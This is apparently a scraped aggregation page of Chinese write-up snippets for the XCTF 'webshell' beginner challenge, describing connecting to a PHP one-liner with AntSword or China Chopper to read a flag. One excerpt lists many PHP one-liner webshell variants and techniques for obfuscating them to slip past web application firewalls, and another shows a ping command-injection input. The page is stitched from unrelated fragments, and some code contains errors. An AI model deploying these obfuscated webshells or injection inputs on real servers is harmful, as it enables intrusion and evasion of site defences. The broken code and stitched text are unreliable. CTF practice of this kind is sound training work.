精华内容
下载资源
问答
  • 攻防世界webshell
    2021-07-28 19:22:11

    在这里插入图片描述
    从文件中我们可以看到这是一个一句话木马,我们可以直接用蚁剑进行连接
    连接的密码就是我们“shell”
    在这里插入图片描述

    更多相关内容
  • 攻防世界webshell

    千次阅读 2020-01-23 11:22:57
    这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里 打开页面,出现一句话木马 ... ... ......

    这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。

    题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里

    打开页面,出现一句话木马
    在这里插入图片描述

    使用蚁剑进行操作,一句话木马中给出密码是shell,进行添加
    在这里插入图片描述
    点击进入添加的地址:
    在这里插入图片描述
    拿到flag
    在这里插入图片描述

    展开全文
  • > 这里我们需要用一种webshell的工具,像以前的超好用的“菜刀”(现在好像不太好用了),或者是“蚁剑”之类的。 下载链接:https://github.com/AntSwordProject github不太稳定,有概率进不去,多试几次就行了。 ...

    题目:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

    根据题意可知,在首页里有一个php一句话。打开首页,可以看到,这句话具体内容为:

    <?php @eval($_POST['shell']);?> 
    

    这里我们需要用一种webshell的工具,像以前的超好用的“菜刀”(现在好像不太好用了),或者是“蚁剑”之类的。

    下载链接:https://github.com/AntSwordProject
    github不太稳定,有概率进不去,多试几次就行了。
    
    安装使用教程:
    https://blog.csdn.net/weixin_43510203/article/details/107596689
    

    正确配置:
    在这里插入图片描述
    找到答案。
    在这里插入图片描述

    在这里插入图片描述

    补充知识:常见的一句话

    来源:https://www.jianshu.com/p/90473b8e6667
    assert函数
    <?php assert(@$_POST['a']); ?>
    
    create_function函数
    <?php 
    $func = create_function('',$_POST['a']);
    $func();
    ?>
    把用户传递的数据生成一个函数func(),然后再执行func()
    
    回调函数
    <?php
    @call_user_func(assert,$_POST['a']);
    ?>
    call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。
    
    preg_replace函数
    <?php 
    @preg_replace("/abcde/e", $_POST['a'], "abcdefg");
    ?>
    这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。
    
    file_put_contents函数
    利用函数生成木马
    
    <?php
    $test='<?php $a=$_POST["cmd"];assert($a); ?>';
    file_put_contents("Trojan.php", $test);
    ?>
    函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。
    
    如何让一句话木马绕过waf ?
    waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。
    
    PHP变量函数
    <?php 
    $a = "eval";
    $a(@$_POST['a']); 
    ?>
    第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。
    
    PHP可变变量
    <?php
    $bb="eval";
    $a="bb";
    $$aa($_POST['a']);
    ?>
    看这句就能理解上述语句:$$aa = $($aa) = $ (‘bb’) = $bb = "eval"
    
    str_replace函数
    <?php
    $a=str_replace("Waldo", "", "eWaldoval");
    $a(@$_POST['a']);
    ?>
    函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"Waldo"。
    
    base64_decode函数
    <?php
    $a=base64_decode("ZXZhbA==")
    $a($_POST['a']);
    ?>
    这里是base64解密函数,"ZXZhbA=="eval的base64加密。
    
    "."操作符
    <?php
    $a="e"."v";
    $b="a"."l";
    $c=$a.$b;
    $c($_POST['a']);
    ?>
    parse_str函数
    <?php
    $str="a=eval";
    parse_str($str);
    $a($_POST['a']);
    ?>
    执行这个函数后,生成一个变量$a,值为字符串"eval"
    

    其他的优秀文章

    https://blog.csdn.net/Wu000999/article/details/101796673
    https://blog.csdn.net/weixin_39995351/article/details/115571963
    https://blog.csdn.net/qq_43307937/article/details/123433717

    展开全文
  • 什么是webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多...

    【题目描述】

    小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

    【附件】

    在线场景

    【过程及思路】

    打开在线场景后出现如下字样:

    先看一些基础概念。

    什么是webshell?

    webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

    简单地说,webshell是一种通过上传脚本就可以管理网站和服务器的环境,很方便。但如果不注意安全控制,也会方便了黑客入侵。

    “一句话木马”

    最基础的一句话如下:

    <?php @eval($_POST[‘value’]);?>

    其中eval函数将括号内的代码通过php语言执行,而括号内就是通过POST方式传递一个名为'value'的表单(value也可以换成其他的名字),加上@后忽略了服务器的报错。

    黑客将包含“一句话”的脚本到服务器,服务器执行后,黑客便可以利用中国菜刀、蚁剑、冰蝎等工具进行连接(菜刀的原理可以见下面的博客),一句话执行的代码会返回目录的句柄,从而拿到网站服务器的webshell,达到浏览、控制的目的。

    更多一句话木马的资料:

    webshell一句话木马大全 – WebShell'S Blog

    中国菜刀原理_weixin_34409822的博客-CSDN博客

    回到题目,它提示一句话已经上传到服务器。

    那我们直接用中国菜刀连接webshell,一句话中的密码是“shell”,地址后面的小框输入密码,连接要等一会。

    连接成功后打开目录内的flag.txt。

    flag已拿到。

    本题通过简单经典的、已经部署了的“一句话木马”来非法获取和控制整个网站服务器中的目录。

    但是,如何编写、如何向服务器上传“一句话”等操作并没有在题中体现。

    【答案】

    cyberpeace{92240939f38abbb642b941750544045c}

    如果文章对你有帮助,就动动手指点赞、喜欢、支持一下咖啡猫吧,谢谢!

    展开全文
  • 题目提示小明已经将php的一句话木马,放入index.php中。 打开题目可以看见,我们用中国菜刀连接的密码是shell。 知道了一句话木马的储存位置,和菜刀... 连接后发现有个flag.txt文件,直接打开查看。 获得flag。......
  • 提示webshell在index.php里面,那就打开场景看看: 显然是一句话木马,密码为shell。 用菜刀或者蚁剑链接一句话,即可找到flag:
  • 攻防世界】web新手练习010 webshell 难度系数:2 题目描述: 小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 题目场景: http://111.200.241.244:63533/ 解题思路 遇见web题目,习惯性F12看...
  • webshell | English 这是一个webshell收集项目 送人玫瑰,手有余香,如果各位下载了本项目,也请您能提交shell 本项目涵盖各种常用脚本 如:asp,aspx,php,jsp,pl,py 如提交各种webshell,请勿更改名称和密码 注意:...
  • 攻防世界(WEB) webshell

    2021-08-25 13:36:10
    做之前先了解了一下webshell是个什么东西 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。...
  • 你会使用webshell吗? <?php @eval($_POST['shell']);?> 先来稍微了解一下木马:在php语言中,最简单的一句话木马语言为 : <?php @eval($_POST['attack']);?> 这句话中eval()函数表示括号内的...
  • 攻防世界Web “xff_referer、webshell、command_execution” 三道题解。
  • 拿到题目,就说: 就说小明放到了index.php里面 打开网站,访问index.php,这里是个细节,虽然这个题目没有挖坑。 有可能首页不是index.php,所以web一定要完整: http://111.200.241.244:59640/index.php ......
  • 攻防世界webshell】解题方法
  • 攻防世界Web新shou区-webshell

    千次阅读 2022-01-02 17:14:27
    攻防世界web新手区webshell解题思路
  • 知识点: (1) 作用:执行一句话木马,可以从客户端连接服务器,可以进行浏览网站结构等操作 (2)eval函数:将接受的字符串当做代码执行 (3)webshell( 通过服务器开放的端口获取服务器的(某种)权限 )的种类...
  • 攻防世界 | webshell WP

    2020-09-13 11:45:50
    转载自http://blog.csdn.net/zouchengzhi1021/article/details/104074674
  • XCTF攻防世界web新手练习_ 8_webshell

    万次阅读 2019-04-29 12:57:57
    XCTF攻防世界web新手练习—webshell 题目 题目为webshell,描述中,重点:把它放在了index.php里 打开题目,你会使用webshell吗?并写出了一句话,从中很容易看出这个一句话的密码是" shell " 顺理成章,打开菜刀...
  • 攻防世界 web webshell

    千次阅读 2020-03-01 13:29:48
    做题两分钟,工具两小时 ...因为这题提示是webshell,所以推测密码是shell,一开始我把那个一句话php放进去发现不对… 3.找到flag.txt cyberpeace{17b8c20c87ed744736dca537ddea2777}
  • 攻防世界第10关webshell

    2021-09-26 19:57:40
    简单粗暴直接/flag.txt
  • 文章目录一、webshell二、使用步骤1.点击获取在线场景2.webshell总结webshell相关例子webshell相关工具 一、webshell 题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&...
  • 访问web shell关卡进入此网站,得到下面一句话 打开蚁剑,右击空白,添加数据 URL 填写网站地址 密码shell 点击添加 ...webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种...
  • 网络安全学习攻防世界[刷题笔记]Web方向(新手区)(后半)xff_referer 攻防世界[刷题笔记] Web方向(新手区)(后半) xff_referer 题目来源: Cyberpeace-n3k0 题目描述:X老师告诉小宁其实xff和referer是可以伪造...
  • 攻防世界-web webshell

    2022-02-09 09:39:42
    题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 直接尝试用蚁剑连接 连接成功,找到flag cyberpeace{becea3d09c5e643ea19022b803b16f4c}
  • 添加完毕后点击GO即可得到flag Referer: https://www.google.com X-Forwarded-For: 123.123.123.123 0x010 webshell 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 解题思路: 访问页面...
  • 攻防世界web刷题

    千次阅读 2022-02-11 16:47:06
    攻防世界web新手区view_sourcerobotsbackupcookiedisabled_buttonweak_authsimple_phpget_post view_source 随手打开源代码发现答案就在这里 robots 查看robots.txt文件 发现flag文件 backup 如果网站存在备份文件,...
  • XCTF攻防世界WEB新手区题目writeup

    千次阅读 2019-09-14 16:34:09
    webshell view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 点开题目在线场景,是一个网页 在网页的空白页确实无法使用右键点开查看源文件,不过直接使用...
  • 攻防世界web练习题

    2022-01-11 10:23:14
    https://www.google.com 10.webshell 带有恶意目的的正常代码,蚁剑添加shell 11.command_execution ping命令常常会存在命令注入漏洞,可以用127.0.0.0.1&&ls 来测试 127.0.0.1&& find / -name “flag*”打开这个...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 547
精华内容 218
关键字:

攻防世界webshell

友情链接: WindriverOv511Plus.rar